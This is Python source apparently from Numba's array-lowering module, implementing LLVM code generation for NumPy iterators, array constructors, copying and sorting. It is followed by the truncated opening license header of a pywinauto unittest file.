instance of types.NumpyFlatType).
"""
return _make_flattening_iter_cls(flatiterty, 'flat')
def make_array_ndenumerate_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdEnumerateType).
"""
return _make_flattening_iter_cls(nditerty, 'ndenumerate')
def _increment_indices(context, builder, ndim, shape, indices, end_flag=None):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end_increment')
if end_flag is not None:
builder.store(cgutils.false_byte, end_flag)
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = increment_index(builder, builder.load(idxptr))
count = shape[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
builder.store(idx, idxptr)
builder.branch(bbend)
builder.store(zero, idxptr)
if end_flag is not None:
builder.store(cgutils.true_byte, end_flag)
builder.branch(bbend)
builder.position_at_end(bbend)
def _increment_indices_array(context, builder, arrty, arr, indices, end_flag=None):
shape = cgutils.unpack_tuple(builder, arr.shape, arrty.ndim)
_increment_indices(context, builder, arrty.ndim, shape, indices, end_flag)
def make_ndindex_cls(nditerty):
"""
Return the Structure representation of the given *nditerty* (an
instance of types.NumpyNdIndexType).
"""
ndim = nditerty.ndim
class NdIndexIter(cgutils.create_struct_proxy(nditerty)):
"""
.ndindex() implementation.
"""
def init_specific(self, context, builder, shapes):
zero = context.get_constant(types.intp, 0)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
ndim))
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic.
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.exhausted = exhausted
self.shape = cgutils.pack_array(builder, shapes, zero.type)
def iternext_specific(self, context, builder, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
exhausted = cgutils.as_bool_bit(builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, exhausted):
result.set_valid(False)
builder.branch(bbend)
indices = [builder.load(cgutils.gep_inbounds(builder, self.indices, dim))
for dim in range(ndim)]
for load in indices:
mark_positive(builder, load)
result.yield_(cgutils.pack_array(builder, indices, zero.type))
result.set_valid(True)
shape = cgutils.unpack_tuple(builder, self.shape, ndim)
_increment_indices(context, builder, ndim, shape,
self.indices, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
return NdIndexIter
def _make_flattening_iter_cls(flatiterty, kind):
assert kind in ('flat', 'ndenumerate')
array_type = flatiterty.array_type
dtype = array_type.dtype
if array_type.layout == 'C':
class CContiguousFlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
.flat() / .ndenumerate() implementation for C-contiguous arrays.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
self.index = cgutils.alloca_once_value(builder, zero)
# We can't trust strides[-1] to always contain the right
# step value, see
# http://docs.scipy.org/doc/numpy-dev/release.html#npy-relaxed-strides-checking
self.stride = arr.itemsize
if kind == 'ndenumerate':
# Zero-initialize the indices array.
indices = cgutils.alloca_once(
builder, zero.type,
size=context.get_constant(types.intp, arrty.ndim))
for dim in range(arrty.ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
builder.store(zero, idxptr)
self.indices = indices
# NOTE: Using gep() instead of explicit pointer addition helps
# LLVM vectorize the loop (since the stride is known and
# constant). This is not possible in the non-contiguous case,
# where the strides are unknown at compile-time.
def iternext_specific(self, context, builder, arrty, arr, result):
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
ndim = arrty.ndim
nitems = arr.nitems
index = builder.load(self.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with cgutils.if_likely(builder, is_valid):
ptr = builder.gep(arr.data, [index])
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate(): fetch and increment indices
indices = self.indices
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
_increment_indices_array(context, builder, arrty, arr, indices)
index = builder.add(index, one)
builder.store(index, self.index)
def getitem(self, context, builder, arrty, arr, index):
ptr = builder.gep(arr.data, [index])
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = builder.gep(arr.data, [index])
store_item(context, builder, arrty, value, ptr)
return CContiguousFlatIter
else:
class FlatIter(cgutils.create_struct_proxy(flatiterty)):
"""
Generic .flat() / .ndenumerate() implementation for
non-contiguous arrays.
It keeps track of pointers along each dimension in order to
minimize computations.
"""
def init_specific(self, context, builder, arrty, arr):
zero = context.get_constant(types.intp, 0)
data = arr.data
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
indices = cgutils.alloca_once(builder, zero.type,
size=context.get_constant(types.intp,
arrty.ndim))
pointers = cgutils.alloca_once(builder, data.type,
size=context.get_constant(types.intp,
arrty.ndim))
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
exhausted = cgutils.alloca_once_value(builder, cgutils.false_byte)
# Initialize indices and pointers with their start values.
for dim in range(ndim):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
builder.store(data, ptrptr)
builder.store(zero, idxptr)
# 0-sized dimensions really indicate an empty array,
# but we have to catch that condition early to avoid
# a bug inside the iteration logic (see issue #846).
dim_size = shapes[dim]
dim_is_empty = builder.icmp(lc.ICMP_EQ, dim_size, zero)
with cgutils.if_unlikely(builder, dim_is_empty):
builder.store(cgutils.true_byte, exhausted)
self.indices = indices
self.pointers = pointers
self.exhausted = exhausted
def iternext_specific(self, context, builder, arrty, arr, result):
ndim = arrty.ndim
data = arr.data
shapes = cgutils.unpack_tuple(builder, arr.shape, ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, ndim)
indices = self.indices
pointers = self.pointers
zero = context.get_constant(types.intp, 0)
one = context.get_constant(types.intp, 1)
bbend = builder.append_basic_block('end')
# Catch already computed iterator exhaustion
is_exhausted = cgutils.as_bool_bit(
builder, builder.load(self.exhausted))
with cgutils.if_unlikely(builder, is_exhausted):
result.set_valid(False)
builder.branch(bbend)
result.set_valid(True)
# Current pointer inside last dimension
last_ptr = cgutils.gep_inbounds(builder, pointers, ndim - 1)
ptr = builder.load(last_ptr)
value = load_item(context, builder, arrty, ptr)
if kind == 'flat':
result.yield_(value)
else:
# ndenumerate() => yield (indices, value)
idxvals = [builder.load(cgutils.gep_inbounds(builder, indices, dim))
for dim in range(ndim)]
idxtuple = cgutils.pack_array(builder, idxvals)
result.yield_(
cgutils.make_anonymous_struct(builder, [idxtuple, value]))
# Update indices and pointers by walking from inner
# dimension to outer.
for dim in reversed(range(ndim)):
idxptr = cgutils.gep_inbounds(builder, indices, dim)
idx = builder.add(builder.load(idxptr), one)
count = shapes[dim]
stride = strides[dim]
in_bounds = builder.icmp(lc.ICMP_SLT, idx, count)
with cgutils.if_likely(builder, in_bounds):
# Index is valid => pointer can simply be incremented.
builder.store(idx, idxptr)
ptrptr = cgutils.gep_inbounds(builder, pointers, dim)
ptr = builder.load(ptrptr)
ptr = cgutils.pointer_add(builder, ptr, stride)
builder.store(ptr, ptrptr)
# Reset pointers in inner dimensions
for inner_dim in range(dim + 1, ndim):
ptrptr = cgutils.gep_inbounds(builder, pointers, inner_dim)
builder.store(ptr, ptrptr)
builder.branch(bbend)
# Reset index and continue with next dimension
builder.store(zero, idxptr)
# End of array
builder.store(cgutils.true_byte, self.exhausted)
builder.branch(bbend)
builder.position_at_end(bbend)
def _ptr_for_index(self, context, builder, arrty, arr, index):
ndim = arrty.ndim
shapes = cgutils.unpack_tuple(builder, arr.shape, count=ndim)
strides = cgutils.unpack_tuple(builder, arr.strides, count=ndim)
# First convert the flattened index into a regular n-dim index
indices = []
for dim in reversed(range(ndim)):
indices.append(builder.urem(index, shapes[dim]))
index = builder.udiv(index, shapes[dim])
indices.reverse()
ptr = cgutils.get_item_pointer2(builder, arr.data, shapes,
strides, arrty.layout, indices)
return ptr
def getitem(self, context, builder, arrty, arr, index):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
return load_item(context, builder, arrty, ptr)
def setitem(self, context, builder, arrty, arr, index, value):
ptr = self._ptr_for_index(context, builder, arrty, arr, index)
store_item(context, builder, arrty, value, ptr)
return FlatIter
@builtin_attr
@impl_attribute(types.Kind(types.Array), "flat", types.Kind(types.NumpyFlatType))
def make_array_flatiter(context, builder, arrty, arr):
flatitercls = make_array_flat_cls(types.NumpyFlatType(arrty))
flatiter = flatitercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
flatiter.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
flatiter.init_specific(context, builder, arrty, arr)
res = flatiter._getvalue()
return impl_ret_borrowed(context, builder, types.NumpyFlatType(arrty), res)
@builtin
@implement('iternext', types.Kind(types.NumpyFlatType))
@iternext_impl
def iternext_numpy_flatiter(context, builder, sig, args, result):
[flatiterty] = sig.args
[flatiter] = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
flatiter.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement('getitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer))
def iternext_numpy_getitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.getitem(context, builder, arrty, arr, index)
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.NumpyFlatType), types.Kind(types.Integer),
types.Any)
def iternext_numpy_getitem(context, builder, sig, args):
flatiterty = sig.args[0]
flatiter, index, value = args
flatitercls = make_array_flat_cls(flatiterty)
flatiter = flatitercls(context, builder, value=flatiter)
arrty = flatiterty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(flatiter.array))
res = flatiter.setitem(context, builder, arrty, arr, index, value)
return context.get_dummy_value()
@builtin
@implement(numpy.ndenumerate, types.Kind(types.Array))
def make_array_ndenumerate(context, builder, sig, args):
arrty, = sig.args
arr, = args
nditercls = make_array_ndenumerate_cls(types.NumpyNdEnumerateType(arrty))
nditer = nditercls(context, builder)
arrayptr = cgutils.alloca_once_value(builder, arr)
nditer.array = arrayptr
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, ref=arrayptr)
nditer.init_specific(context, builder, arrty, arr)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdEnumerateType))
@iternext_impl
def iternext_numpy_nditer(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_array_ndenumerate_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
arrty = nditerty.array_type
arrcls = context.make_array(arrty)
arr = arrcls(context, builder, value=builder.load(nditer.array))
nditer.iternext_specific(context, builder, arrty, arr, result)
@builtin
@implement(numpy.ndindex, types.VarArg(types.Kind(types.Integer)))
def make_array_ndindex(context, builder, sig, args):
"""ndindex(*shape)"""
shape = [context.cast(builder, arg, argty, types.intp)
for argty, arg in zip(sig.args, args)]
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ndindex, types.Kind(types.BaseTuple))
def make_array_ndindex(context, builder, sig, args):
"""ndindex(shape)"""
ndim = sig.return_type.ndim
if ndim > 0:
idxty = sig.args[0].dtype
tup = args[0]
shape = cgutils.unpack_tuple(builder, tup, ndim)
shape = [context.cast(builder, idx, idxty, types.intp)
for idx in shape]
else:
shape = []
nditercls = make_ndindex_cls(types.NumpyNdIndexType(len(shape)))
nditer = nditercls(context, builder)
nditer.init_specific(context, builder, shape)
res = nditer._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('iternext', types.Kind(types.NumpyNdIndexType))
@iternext_impl
def iternext_numpy_ndindex(context, builder, sig, args, result):
[nditerty] = sig.args
[nditer] = args
nditercls = make_ndindex_cls(nditerty)
nditer = nditercls(context, builder, value=nditer)
nditer.iternext_specific(context, builder, result)
# -----------------------------------------------------------------------------
# Numpy array constructors
def _empty_nd_impl(context, builder, arrtype, shapes):
"""Utility function used for allocating a new array during LLVM code
generation (lowering). Given a target context, builder, array
type, and a tuple or list of lowered dimension sizes, returns a
LLVM value pointing at a Numba runtime allocated array.
"""
arycls = make_array(arrtype)
ary = arycls(context, builder)
datatype = context.get_data_type(arrtype.dtype)
itemsize = context.get_constant(types.intp,
context.get_abi_sizeof(datatype))
# compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
if arrtype.ndim == 0:
strides = ()
elif arrtype.layout == 'C':
strides = [itemsize]
for dimension_size in reversed(shapes[1:]):
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(reversed(strides))
elif arrtype.layout == 'F':
strides = [itemsize]
for dimension_size in shapes[:-1]:
strides.append(builder.mul(strides[-1], dimension_size))
strides = tuple(strides)
else:
raise NotImplementedError(
"Don't know how to allocate array with layout '{0}'.".format(
arrtype.layout))
allocsize = builder.mul(itemsize, arrlen)
# NOTE: AVX prefer 32-byte alignment
meminfo = context.nrt_meminfo_alloc_aligned(builder, size=allocsize,
align=32)
data = context.nrt_meminfo_data(builder, meminfo)
intp_t = context.get_value_type(types.intp)
shape_array = cgutils.pack_array(builder, shapes, ty=intp_t)
strides_array = cgutils.pack_array(builder, strides, ty=intp_t)
populate_array(ary,
data=builder.bitcast(data, datatype.as_pointer()),
shape=shape_array,
strides=strides_array,
itemsize=itemsize,
meminfo=meminfo)
return ary
def _zero_fill_array(context, builder, ary):
"""
Zero-fill an array. The array must be contiguous.
"""
cgutils.memset(builder, ary.data, builder.mul(ary.itemsize, ary.nitems), 0)
def _parse_empty_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty(), np.zeros() or np.ones() call.
"""
arrshapetype = sig.args[0]
arrshape = args[0]
arrtype = sig.return_type
if isinstance(arrshapetype, types.Integer):
ndim = 1
shapes = [context.cast(builder, arrshape, arrshapetype, types.intp)]
else:
ndim = arrshapetype.count
arrshape = context.cast(builder, arrshape, arrshapetype,
types.UniTuple(types.intp, ndim))
shapes = cgutils.unpack_tuple(builder, arrshape, count=ndim)
zero = context.get_constant_generic(builder, types.intp, 0)
for dim in range(ndim):
is_neg = builder.icmp_signed('<', shapes[dim], zero)
with cgutils.if_unlikely(builder, is_neg):
context.call_conv.return_user_exc(builder, ValueError,
("negative dimensions not allowed",))
return arrtype, shapes
def _parse_empty_like_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty_like(), np.zeros_like() or
np.ones_like() call.
"""
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape, count=arytype.ndim)
return sig.return_type, shapes
@builtin
@implement(numpy.empty, types.Any)
@implement(numpy.empty, types.Any, types.Any)
def numpy_empty_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.empty_like, types.Kind(types.Array))
@implement(numpy.empty_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_empty_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros, types.Any)
@implement(numpy.zeros, types.Any, types.Any)
def numpy_zeros_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros_like, types.Kind(types.Array))
@implement(numpy.zeros_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_zeros_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
if numpy_version >= (1, 8):
@builtin
@implement(numpy.full, types.Any, types.Any)
def numpy_full_nd(context, builder, sig, args):
def full(shape, value):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full, types.Any, types.Any, types.Kind(types.DTypeSpec))
def numpy_full_dtype_nd(context, builder, sig, args):
def full(shape, value, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any)
def numpy_full_like_nd(context, builder, sig, args):
def full_like(arr, value):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any, types.Kind(types.DTypeSpec))
def numpy_full_like_nd(context, builder, sig, args):
def full_like(arr, value, dtype):
arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any)
def numpy_ones_nd(context, builder, sig, args):
def ones(shape):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
valty = sig.return_type.dtype
res = context.compile_internal(builder, ones, sig, args,
locals={'c': valty})
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any, types.Kind(types.DTypeSpec))
def numpy_ones_dtype_nd(context, builder, sig, args):
def ones(shape, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array))
def numpy_ones_like_nd(context, builder, sig, args):
def ones_like(arr):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_ones_like_dtype_nd(context, builder, sig, args):
def ones_like(arr, dtype):
arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer))
def numpy_identity(context, builder, sig, args):
def identity(n):
arr = numpy.zeros((n, n))
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_identity(context, builder, sig, args):
def identity(n, dtype):
arr = numpy.zeros((n, n), dtype)
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n):
return numpy.identity(n)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n, m):
return numpy.eye(n, m, 0, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n, m, k):
return numpy.eye(n, m, k, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_eye(context, builder, sig, args):
def eye(n, m, k, dtype):
arr = numpy.zeros((n, m), dtype)
if k >= 0:
d = min(n, m - k)
for i in range(d):
arr[i, i + k] = 1
else:
d = min(n + k, m)
for i in range(d):
arr[i - k, i] = 1
return arr
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number))
def numpy_arange_1(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(stop):
return numpy.arange(0, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number))
def numpy_arange_2(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop):
return numpy.arange(start, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number))
def numpy_arange_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop, step):
return numpy.arange(start, stop, step, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number), types.Kind(types.DTypeSpec))
def numpy_arange_4(context, builder, sig, args):
if any(isinstance(a, types.Complex) for a in sig.args):
def arange(start, stop, step, dtype):
nitems_c = (stop - start) / step
nitems_r = math.ceil(nitems_c.real)
nitems_i = math.ceil(nitems_c.imag)
nitems = max(min(nitems_i, nitems_r), 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
else:
def arange(start, stop, step, dtype):
nitems_r = math.ceil((stop - start) / step)
nitems = max(nitems_r, 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
res = context.compile_internal(builder, arange, sig, args,
locals={'nitems': types.intp})
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number))
def numpy_linspace_2(context, builder, sig, args):
def linspace(start, stop):
return numpy.linspace(start, stop, 50)
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Integer))
def numpy_linspace_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def linspace(start, stop, num):
arr = numpy.empty(num, dtype)
div = num - 1
delta = stop - start
arr[0] = start
for i in range(1, num):
arr[i] = start + delta * (i / div)
return arr
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement("array.copy", types.Kind(types.Array))
def array_copy(context, builder, sig, args):
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape)
rettype = sig.return_type
ret = _empty_nd_impl(context, builder, rettype, shapes)
src_data = ary.data
dest_data = ret.data
assert rettype.layout == "C"
if arytype.layout == "C":
# Fast path: memcpy
# Compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
arrlen = builder.mul(arrlen, ary.itemsize)
pchar = lc.Type.int(8).as_pointer()
memcpy = builder.module.declare_intrinsic(
'llvm.memcpy', [pchar, pchar, arrlen.type])
builder.call(memcpy,
(builder.bitcast(dest_data, pchar),
builder.bitcast(src_data, pchar),
arrlen,
lc.Constant.int(lc.Type.int(32), 0),
lc.Constant.int(lc.Type.int(1), 0),
))
else:
src_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_strides = cgutils.unpack_tuple(builder, ret.strides)
intp_t = context.get_value_type(types.intp)
with cgutils.loop_nest(builder, shapes, intp_t) as indices:
src_ptr = cgutils.get_item_pointer2(builder, src_data,
shapes, src_strides,
arytype.layout, indices)
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
shapes, dest_strides,
rettype.layout, indices)
builder.store(builder.load(src_ptr), dest_ptr)
return impl_ret_new_ref(context, builder, sig.return_type, ret._getvalue())
@builtin
@implement(numpy.frombuffer, types.Kind(types.Buffer))
@implement(numpy.frombuffer, types.Kind(types.Buffer), types.Kind(types.DTypeSpec))
def np_frombuffer(context, builder, sig, args):
bufty = sig.args[0]
aryty = sig.return_type
buf = make_array(bufty)(context, builder, value=args[0])
out_ary_ty = make_array(aryty)
out_ary = out_ary_ty(context, builder)
out_datamodel = out_ary._datamodel
itemsize = get_itemsize(context, aryty)
ll_itemsize = lc.Constant.int(buf.itemsize.type, itemsize)
nbytes = builder.mul(buf.nitems, buf.itemsize)
# Check that the buffer size is compatible
rem = builder.srem(nbytes, ll_itemsize)
is_incompatible = cgutils.is_not_null(builder, rem)
with builder.if_then(is_incompatible, likely=False):
msg = "buffer size must be a multiple of element size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
shape = cgutils.pack_array(builder, [builder.sdiv(nbytes, ll_itemsize)])
strides = cgutils.pack_array(builder, [ll_itemsize])
data = builder.bitcast(buf.data,
context.get_value_type(out_datamodel.get_type('data')))
populate_array(out_ary,
data=data,
shape=shape,
strides=strides,
itemsize=ll_itemsize,
meminfo=buf.meminfo,
parent=buf.parent,)
res = out_ary._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
# -----------------------------------------------------------------------------
# Sorting
_sorting_init = False
def lt_floats(a, b):
return math.isnan(b) or a < b
def load_sorts():
"""
Load quicksort lazily, to avoid circular imports accross the jit() global.
"""
g = globals()
if g['_sorting_init']:
return
default_quicksort = quicksort.make_jit_quicksort()
g['run_default_quicksort'] = default_quicksort.run_quicksort
float_quicksort = quicksort.make_jit_quicksort(lt=lt_floats)
g['run_float_quicksort'] = float_quicksort.run_quicksort
g['_sorting_init'] = True
@builtin
@implement("array.sort", types.Kind(types.Array))
def array_sort(context, builder, sig, args):
load_sorts()
arytype = sig.args[0]
dtype = arytype.dtype
if isinstance(dtype, types.Float):
def array_sort_impl(arr):
return run_float_quicksort(arr)
else:
def array_sort_impl(arr):
return run_default_quicksort(arr)
return context.compile_internal(builder, array_sort_impl, sig, args)
@builtin
@implement(numpy.sort, types.Kind(types.Array))
def np_sort(context, builder, sig, args):
def np_sort_impl(a):
res = a.copy()
res.sort()
return res
return context.compile_internal(builder, np_sort_impl, sig, args)
| bsd-2-clause | -1,622,536,346,280,335,400 | 34.741639 | 96 | 0.599943 | false |
cetygamer/pywinauto | pywinauto/unittests/test_menuwrapper.py | 1 | 6250 | # GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
